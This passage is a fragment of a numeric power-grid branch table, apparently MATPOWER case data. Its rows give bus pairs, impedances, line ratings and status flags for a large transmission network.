1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1448, 513, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1449, 514, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1450, 515, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1451, 516, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1452, 517, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1453, 518, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1454, 519, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1455, 520, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1456, 521, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1457, 522, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1458, 523, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1459, 524, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1460, 525, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1461, 526, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1462, 527, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1463, 528, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1464, 529, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1465, 530, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1466, 531, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1467, 532, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1468, 533, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1469, 534, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1470, 535, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1471, 536, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1472, 537, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1473, 538, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1474, 539, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1475, 540, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1476, 541, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1477, 542, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1479, 544, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1480, 545, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1481, 546, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1482, 547, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1483, 548, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1484, 549, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1485, 550, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1486, 551, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1487, 552, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1488, 554, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1489, 555, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1490, 556, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1491, 557, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1492, 558, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1493, 559, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1494, 560, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1495, 561, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1496, 562, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1497, 563, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1498, 564, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1499, 565, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1500, 566, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1501, 567, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1502, 568, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1503, 569, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1504, 570, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1505, 571, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1506, 572, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1507, 573, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1508, 574, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1510, 576, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1511, 577, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1512, 578, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1513, 579, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1514, 580, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1516, 582, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1517, 583, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1518, 584, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1519, 585, 0, 1e-05, 0, 9999, 9999, 9999, 0, 0, 1, -360, 360 ], [1, 490, 0, 0.01433884297520661, 0.151691958358336, 991.0, 991.0, 991.0, 0, 2, 1, -360, 43.375 ], [3, 4, 0, 0.006291637811634348, 0.903417549506624, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 72.681 ], [491, 6, 0, 0.011200661157024791, 0.118492839955776, 991.0, 991.0, 991.0, 0, 2, 1, -360, 33.882 ], [7, 5, 0, 0.005794840720221606, 0.20802058859584005, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 33.471 ], [8, 9, 0, 0.0024379328254847646, 0.350063268897336, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 28.163 ], [492, 11, 0, 0.018224793388429753, 0.0482004476327704, 495.0, 495.0, 495.0, 0, 1, 1, -360, 27.565 ], [11, 493, 0, 0.030286942148760328, 0.08010209706571599, 495.0, 495.0, 495.0, 0, 1, 1, -360, 45.809 ], [492, 493, 0, 0.04521652892561983, 0.11958747011094399, 495.0, 495.0, 495.0, 0, 1, 1, -360, 68.39 ], [494, 14, 0, 0.012990743801652892, 0.137430291356512, 991.0, 991.0, 991.0, 0, 2, 1, -360, 39.297 ], [13, 15, 0, 0.007681959833795014, 0.27576354266704156, 1711.0, 1711.0, 1711.0, 0, 2, 1, -360, 44.371 ], [16, 5, 0, 0.006275623268698061, 0.22527950450957998, 1711.0, 1711.0, 1711.0, 0, 2, 1, -360, 36.248000000000005 ], [17, 18, 0, 0.04623522622347646, 0.9335989000302801, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 200.291 ], [17, 12, 0, 0.0056020313942728535, 0.113118303398186, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 24.268 ], [14, 495, 0, 0.0017957024793388433, 0.018996904156819597, 991.0, 991.0, 991.0, 0, 1, 1, -360, 5.432 ], [494, 19, 0, 0.010246611570247935, 0.10839986031771602, 991.0, 991.0, 991.0, 0, 1, 1, -360, 30.996 ], [20, 21, 0, 0.005415685595567867, 0.19440984828307922, 1711.0, 1711.0, 1711.0, 0, 2, 1, -360, 31.281 ], [20, 22, 0, 0.0049706544321329645, 0.713737278110032, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 57.42100000000001 ], [497, 23, 0, 0.002190413223140496, 0.005793146490362, 495.0, 495.0, 495.0, 0, 1, 1, -360, 3.313 ], [23, 499, 0, 0.020799669421487598, 0.22004164444829602, 991.0, 991.0, 991.0, 0, 1, 1, -360, 62.919 ], [25, 26, 0, 0.00141845567867036, 0.050919084651523595, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 8.193 ], [25, 22, 0, 0.0035578254847645433, 0.0319293051869808, 856.0, 856.0, 856.0, 0, 1, 1, -360, 10.275 ], [23, 27, 0, 0.027738181818181818, 0.073361203699828, 495.0, 495.0, 495.0, 0, 1, 1, -360, 41.95399999999999 ], [28, 23, 0, 0.012841652892561981, 0.0339632611780132, 495.0, 495.0, 495.0, 0, 1, 1, -360, 19.423 ], [8, 21, 0, 0.004948753462603878, 0.17764812836304802, 1711.0, 1711.0, 1711.0, 0, 2, 1, -360, 28.584 ], [9, 29, 0, 0.002212863573407202, 0.31774552934092004, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 25.563000000000002 ], [30, 25, 0, 0.019958795013850415, 0.17911796401827998, 856.0, 856.0, 856.0, 0, 1, 1, -360, 57.641000000000005 ], [31, 32, 0, 0.0299776084949446, 0.605319030583196, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 129.863 ], [32, 33, 0, 0.016762234533725762, 0.33846927983213604, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 72.61399999999999 ], [34, 35, 0, 0.001931900826446281, 0.020437759184893597, 991.0, 991.0, 991.0, 0, 2, 1, -360, 5.843999999999999 ], [35, 36, 0, 0.0008730578512396695, 0.0092361605077588, 991.0, 991.0, 991.0, 0, 2, 1, -360, 2.641 ], [490, 6, 0, 0.049352066115702475, 0.130525028606764, 495.0, 495.0, 495.0, 0, 1, 1, -360, 74.645 ], [37, 10, 0, 0.02404639889196676, 0.485553838251812, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 104.169 ], [10, 38, 0, 0.006848799630657894, 0.13829351176534158, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 29.669 ], [37, 38, 0, 0.01437834718372576, 1.1613317560186958, 2567.0, 2567.0, 2567.0, 0, 1, 1, -360, 124.574 ], [39, 40, 0, 0.04521629732222991, 0.913024308337812, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 195.877 ], [39, 41, 0, 0.017466989843005543, 0.35269996139852006, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 75.667 ], [42, 41, 0, 0.031145429362880884, 0.6289001042979919, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 134.922 ], [18, 42, 0, 0.03439750692520776, 0.6945672650962679, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 149.01 ], [492, 43, 0, 0.01819173553719008, 0.192452068436848, 991.0, 991.0, 991.0, 0, 2, 1, -360, 55.03 ], [44, 45, 0, 0.02562314049586777, 0.067767398802972, 495.0, 495.0, 495.0, 0, 1, 1, -360, 38.755 ], [44, 505, 0, 0.006061487603305785, 0.0160312607980052, 495.0, 495.0, 495.0, 0, 1, 1, -360, 9.168 ], [46, 12, 0, 0.0014741170360110802, 0.2116687641962416, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 17.029 ], [47, 48, 0, 0.005344182825484765, 0.01199019212302604, 428.0, 428.0, 428.0, 0, 1, 1, -360, 7.7170000000000005 ], [49, 50, 0, 0.0019151662049861494, 0.0171874439892256, 856.0, 856.0, 856.0, 0, 1, 1, -360, 5.531000000000001 ], [31, 33, 0, 0.013475992613088641, 0.27211225959163604, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 58.378 ], [31, 51, 0, 0.003518611495844875, 0.5052381383693519, 3423.0, 3423.0, 3423.0, 0, 1, 1, -360, 40.647 ], [52, 53, 0, 0.010464421745152355, 1.5025884408875438, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 120.885 ], [52, 54, 0, 0.0076126500461911354, 0.1537174637168, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 32.978 ], [506, 55, 0, 0.012634380165289257, 0.133660287181212, 991.0, 991.0, 991.0, 0, 1, 1, -360, 38.219 ], [506, 507, 0, 0.044157355371900825, 0.11678619613628, 495.0, 495.0, 495.0, 0, 1, 1, -360, 66.788 ], [57, 506, 0, 0.004687272727272727, 0.049587095736244, 991.0, 991.0, 991.0, 0, 1, 1, -360, 14.179 ], [57, 58, 0, 0.014436363636363634, 0.0381809096340232, 495.0, 495.0, 495.0, 0, 1, 1, -360, 21.835 ], [58, 506, 0, 0.019797685950413223, 0.052360391943288, 495.0, 495.0, 495.0, 0, 1, 1, -360, 29.944000000000003 ], [59, 60, 0, 0.019407548476454296, 0.174170863885556, 856.0, 856.0, 856.0, 0, 1, 1, -360, 56.049 ], [508, 62, 0, 0.051111404958677685, 0.03379452026753001, 248.0, 248.0, 248.0, 0, 1, 1, -360, 38.653 ], [30, 61, 0, 0.03143698060941828, 0.28212765137935203, 856.0, 856.0, 856.0, 0, 1, 1, -360, 90.79 ], [63, 506, 0, 0.027457190082644623, 0.072618044249872, 495.0, 495.0, 495.0, 0, 1, 1, -360, 41.528999999999996 ], [13, 64, 0, 0.0014816481994459833, 0.2127501654814608, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 17.116 ], [65, 66, 0, 0.03778185595567867, 0.7629053006222161, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 163.671 ], [59, 67, 0, 0.0051880193905817175, 0.046559297286324804, 856.0, 856.0, 856.0, 0, 1, 1, -360, 14.982999999999999 ], [61, 67, 0, 0.012931440443213295, 0.1160517597580644, 856.0, 856.0, 856.0, 0, 1, 1, -360, 37.346 ], [68, 69, 0, 0.011149584487534626, 0.4002427745096039, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 64.4 ], [70, 69, 0, 0.009625346260387812, 0.345526355460808, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 55.596000000000004 ], [71, 72, 0, 0.008878635734072021, 0.318721276477736, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 51.283 ], [73, 74, 0, 0.012529547553116345, 0.253001288604392, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 54.278 ], [37, 75, 0, 0.027459141274238225, 0.5544652029066119, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 118.95299999999999 ], [72, 75, 0, 0.006688711911357341, 0.240108375006292, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 38.634 ], [37, 72, 0, 0.036222068328739615, 0.7314094881920841, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 156.914 ], [76, 77, 0, 0.004683777700831025, 0.6725445900750401, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 54.107 ], [77, 51, 0, 0.00363183864265928, 0.5214964473447999, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 41.955 ], [73, 72, 0, 0.025475069252077563, 0.514402082018968, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 110.35799999999999 ], [18, 40, 0, 0.01302770083102493, 0.26306018504072, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 56.43600000000001 ], [492, 45, 0, 0.0308703030303719, 0.18370114733484796, 743.0, 743.0, 743.0, 0, 1, 1, -360, 70.03699999999999 ], [10, 74, 0, 0.030167359187465374, 0.609150547206812, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 130.685 ], [45, 511, 0, 0.08203371900826446, 0.05424014819960001, 248.0, 248.0, 248.0, 0, 1, 1, -360, 62.038000000000004 ], [78, 32, 0, 0.013458795013850415, 0.48313777647302397, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 77.738 ], [79, 80, 0, 0.0038086911357340715, 0.1367226831743568, 1711.0, 1711.0, 1711.0, 0, 2, 1, -360, 21.999000000000002 ], [81, 79, 0, 0.010767832409972299, 0.3865388099484561, 1711.0, 1711.0, 1711.0, 0, 2, 1, -360, 62.195 ], [34, 82, 0, 0.0015497520661157025, 0.00409874294399768, 495.0, 495.0, 495.0, 0, 1, 1, -360, 2.344 ], [83, 84, 0, 0.00902611570247934, 0.0238720301499152, 495.0, 495.0, 495.0, 0, 1, 1, -360, 13.652000000000001 ], [83, 499, 0, 0.04179570247933885, 0.0276350398834796, 248.0, 248.0, 248.0, 0, 1, 1, -360, 31.608 ], [85, 86, 0, 0.00802354570637119, 0.28802563884886, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 46.343999999999994 ], [87, 86, 0, 0.01904968836565097, 0.683837154069184, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 110.031 ], [88, 89, 0, 0.00380297520661157, 0.010058007429140002, 495.0, 495.0, 495.0, 0, 1, 1, -360, 5.752000000000001 ], [90, 86, 0, 0.012097818559556786, 0.434282055192244, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 69.877 ], [91, 86, 0, 9.26246537396122e-05, 0.013299992817559201, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 1.07 ], [86, 92, 0, 0.0001852493074792244, 0.0066499964087796005, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 1.07 ], [86, 93, 0, 0.008152181440443215, 0.292643346635492, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 47.086999999999996 ], [94, 86, 0, 0.012883829639889197, 0.46249792780547194, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 74.417 ], [86, 95, 0, 0.010421052631578947, 0.37409026526870803, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 60.192 ], [513, 517, 0, 0.0008733884297520661, 0.0023099144321748, 495.0, 495.0, 495.0, 0, 1, 1, -360, 1.321 ], [97, 66, 0, 0.03812777008310249, 0.34217338998058805, 856.0, 856.0, 856.0, 0, 1, 1, -360, 110.113 ], [42, 98, 0, 0.003091759002770083, 0.44394630230884, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 35.716 ], [99, 100, 0, 0.016371537396121884, 0.587698093837988, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 94.56200000000001 ], [42, 101, 0, 0.008165339335180054, 0.29311568282888, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 47.163000000000004 ], [102, 42, 0, 0.012403047091412742, 0.44523901189173193, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 71.64 ], [103, 87, 0, 0.007073060941828254, 0.25390556381756, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 40.854 ], [104, 103, 0, 0.0028852146814404432, 0.1035721403291428, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 16.665 ], [105, 87, 0, 0.006406682825484765, 0.22998422159488002, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 37.005 ], [106, 107, 0, 0.005714219759923823, 0.11538365264216799, 1283.0, 1283.0, 1283.0, 0, 1, 1, -360, 24.754 ], [108, 107, 0, 0.0025427631578947367, 0.09127896939786201, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 14.687000000000001 ], [109, 106, 0, 0.003030470914127424, 0.10878648330773438, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 17.504 ], [110, 111, 0, 0.019821849030470913, 0.7115558306889919, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 114.491 ], [87, 112, 0, 0.006135907202216068, 0.220264039928212, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 35.441 ], [113, 87, 0, 0.003981648199445983, 0.14293141813921081, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 22.998 ], [87, 85, 0, 0.011046225761772853, 0.3965324494097, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 63.803000000000004 ], [110, 114, 0, 0.011665339335180056, 0.418757110306188, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 67.37899999999999 ], [115, 116, 0, 0.007048925619834712, 0.07457124214588401, 991.0, 991.0, 991.0, 0, 1, 1, -360, 21.323 ], [117, 118, 0, 0.005987534626038782, 0.21493782785077598, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 34.584 ], [117, 119, 0, 0.0038738746537396117, 0.5562504472696961, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 44.751000000000005 ], [117, 120, 0, 0.005886686288088643, 0.8452704781039522, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 68.003 ], [121, 122, 0, 0.0021170360110803325, 0.0759964075574972, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 12.228 ], [123, 124, 0, 0.0018386426592797783, 0.0660027680945204, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 10.62 ], [125, 126, 0, 0.004941135734072022, 0.17737467056702802, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 28.54 ], [127, 119, 0, 0.0029027008310249305, 0.1041998502705648, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 16.766 ], [118, 128, 0, 0.007397160664819945, 0.265539950057812, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 42.726000000000006 ], [121, 119, 0, 0.002552458448753463, 0.0916270065931116, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 14.743 ], [530, 527, 0, 0.022726611570247933, 0.060106736329903994, 495.0, 495.0, 495.0, 0, 1, 1, -360, 34.374 ], [125, 130, 0, 0.002931440443213297, 0.105231531956442, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 16.932000000000002 ], [125, 123, 0, 0.0019078081717451524, 0.2739425623421336, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 22.039 ], [131, 132, 0, 0.0035744459833795014, 0.12831385593973843, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 20.646 ], [133, 123, 0, 0.003864439058171745, 0.13872389704704202, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 22.320999999999998 ], [524, 134, 0, 0.008092231404958678, 0.08560847143881999, 991.0, 991.0, 991.0, 0, 1, 1, -360, 24.479 ], [135, 136, 0, 0.005242901662049862, 0.1882073282678, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 30.283 ], [123, 131, 0, 0.003138331024930748, 0.1126583971045252, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 18.127 ], [117, 128, 0, 0.010800034626038782, 0.38769479063117196, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 62.381 ], [137, 521, 0, 0.013832396694214875, 0.14633421587532003, 991.0, 991.0, 991.0, 0, 2, 1, -360, 41.843 ], [531, 514, 0, 0.0059504132231404955, 0.035409362037522, 743.0, 743.0, 743.0, 0, 1, 1, -360, 13.5 ], [139, 521, 0, 0.021257520661157023, 0.05622132386323199, 495.0, 495.0, 495.0, 0, 1, 1, -360, 32.152 ], [140, 514, 0, 0.018527603305785127, 0.04900131122836401, 495.0, 495.0, 495.0, 0, 1, 1, -360, 28.023000000000003 ], [522, 141, 0, 0.012168595041322314, 0.032183175718526795, 495.0, 495.0, 495.0, 0, 1, 1, -360, 18.405 ], [142, 523, 0, 0.007060165289256198, 0.0746901476577608, 991.0, 991.0, 991.0, 0, 2, 1, -360, 21.357 ], [530, 526, 0, 0.020281652892561983, 0.053640374808152, 495.0, 495.0, 495.0, 0, 1, 1, -360, 30.676 ], [140, 532, 0, 0.004669090909090909, 0.0123486871461184, 495.0, 495.0, 495.0, 0, 1, 1, -360, 7.062 ], [142, 144, 0, 0.006678126721756199, 0.0397397958689204, 743.0, 743.0, 743.0, 0, 1, 1, -360, 15.151 ], [140, 522, 0, 0.020450247933884298, 0.05408627047793199, 495.0, 495.0, 495.0, 0, 1, 1, -360, 30.930999999999997 ], [145, 146, 0, 0.028527603305785125, 0.07544904460236, 495.0, 495.0, 495.0, 0, 1, 1, -360, 43.148 ], [147, 523, 0, 0.02461289256198347, 0.0650955220034416, 495.0, 495.0, 495.0, 0, 2, 1, -360, 37.227 ], [144, 523, 0, 0.008479338842975206, 0.0224259292904064, 495.0, 495.0, 495.0, 0, 1, 1, -360, 12.825 ], [139, 523, 0, 0.029245619834710742, 0.0193370088934308, 248.0, 248.0, 248.0, 0, 1, 1, -360, 22.116999999999997 ], [140, 141, 0, 0.008362975206611572, 0.022118173847506, 495.0, 495.0, 495.0, 0, 1, 1, -360, 12.649000000000001 ], [528, 526, 0, 0.015389090909090908, 0.0407006573227188, 495.0, 495.0, 495.0, 0, 1, 1, -360, 23.276 ], [528, 148, 0, 0.014306115702479338, 0.0378364333712244, 495.0, 495.0, 495.0, 0, 1, 1, -360, 21.638 ], [149, 150, 0, 0.013604628099173552, 0.035981157661543604, 495.0, 495.0, 495.0, 0, 1, 1, -360, 20.576999999999998 ], [145, 528, 0, 0.00320595041322314, 0.0084790121737992, 495.0, 495.0, 495.0, 0, 1, 1, -360, 4.849 ], [530, 151, 0, 0.013144462809917355, 0.0347641247737036, 495.0, 495.0, 495.0, 0, 1, 1, -360, 19.881 ], [524, 152, 0, 0.014598347107438016, 0.03860931919944, 495.0, 495.0, 495.0, 0, 1, 1, -360, 22.08 ], [149, 525, 0, 0.016897190082644627, 0.17875695122823998, 991.0, 991.0, 991.0, 0, 2, 1, -360, 51.114 ], [139, 514, 0, 0.007824132231404959, 0.020693056313687997, 495.0, 495.0, 495.0, 0, 1, 1, -360, 11.834000000000001 ], [126, 120, 0, 0.012780297783933518, 0.458781387757004, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 73.819 ], [530, 153, 0, 0.02254545454545455, 0.059627617060924, 495.0, 495.0, 495.0, 0, 1, 1, -360, 34.1 ], [528, 147, 0, 0.15786710743801652, 0.104380679149868, 248.0, 248.0, 248.0, 0, 1, 1, -360, 119.387 ], [528, 154, 0, 0.006528264462809917, 0.017265779790547203, 495.0, 495.0, 495.0, 0, 2, 1, -360, 9.874 ], [130, 120, 0, 0.01450502077562327, 0.5206947188067639, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 83.781 ], [528, 155, 0, 0.16064132231404957, 0.1062149715341, 248.0, 248.0, 248.0, 0, 1, 1, -360, 121.485 ], [524, 533, 0, 0.004432727272727273, 0.0468942356109744, 991.0, 991.0, 991.0, 0, 1, 1, -360, 13.409 ], [524, 149, 0, 0.0056413223140495865, 0.05968007537478799, 991.0, 991.0, 991.0, 0, 2, 1, -360, 17.065 ], [154, 150, 0, 0.007539173553719007, 0.0199394052006688, 495.0, 495.0, 495.0, 0, 2, 1, -360, 11.402999999999999 ], [157, 110, 0, 0.009962084487534625, 0.357614433044424, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 57.541000000000004 ], [119, 158, 0, 0.0002490189289012004, 0.08045252664623159, 5134.0, 5134.0, 5134.0, 0, 3, 1, -360, 4.315 ], [159, 60, 0, 0.010967451523545706, 0.0984261617997728, 856.0, 856.0, 856.0, 0, 1, 1, -360, 31.674 ], [536, 161, 0, 0.021314380165289255, 0.056371704363524, 495.0, 495.0, 495.0, 0, 1, 1, -360, 32.238 ], [115, 151, 0, 0.00379404958677686, 0.0401376047510724, 991.0, 991.0, 991.0, 0, 1, 1, -360, 11.477 ], [162, 134, 0, 0.0015910743801652895, 0.016832124393744, 991.0, 991.0, 991.0, 0, 2, 1, -360, 4.813 ], [115, 526, 0, 0.0037884297520661154, 0.010019537998747198, 495.0, 495.0, 495.0, 0, 1, 1, -360, 5.73 ], [138, 87, 0, 0.0011838642659279777, 0.16999131006813442, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 13.675999999999998 ], [123, 163, 0, 0.0022778739612188364, 0.08177009602828919, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 13.157 ], [112, 164, 0, 0.0008672957063711912, 0.12453516639176802, 3423.0, 3423.0, 3423.0, 0, 2, 1, -360, 10.019 ], [112, 165, 0, 0.005989439058171744, 0.21500619230086396, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 34.595 ], [166, 165, 0, 0.002632790858725762, 0.09451074335350361, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 15.207 ], [167, 537, 0, 0.00832595041322314, 0.08808100664460242, 991.0, 991.0, 991.0, 0, 2, 1, -360, 25.186 ], [168, 104, 0, 0.002552458448753463, 0.0916270065931116, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 14.743 ], [531, 520, 0, 0.016156694214876033, 0.042730794079516396, 495.0, 495.0, 495.0, 0, 1, 1, -360, 24.436999999999998 ], [139, 520, 0, 0.010682314049586776, 0.0282522993797748, 495.0, 495.0, 495.0, 0, 1, 1, -360, 16.157 ], [520, 169, 0, 0.0011328925619834712, 0.0119849761681232, 991.0, 991.0, 991.0, 0, 2, 1, -360, 3.427 ], [168, 105, 0, 0.007340893351800554, 0.26352009133553606, 1711.0, 1711.0, 1711.0, 0, 1, 1, -360, 42.401 ], [520, 170, 0, 0.005842644628099174, 0.015452470732151198, 495.0, 495.0, 495.0, 0, 2, 1, -360, 8.837 ], [171, 89, 0, 0.005505454545454546, 0.058242717567848004, 991.0, 991.0, 991.0, 0, 1, 1, -360, 16.654 ], [521, 172, 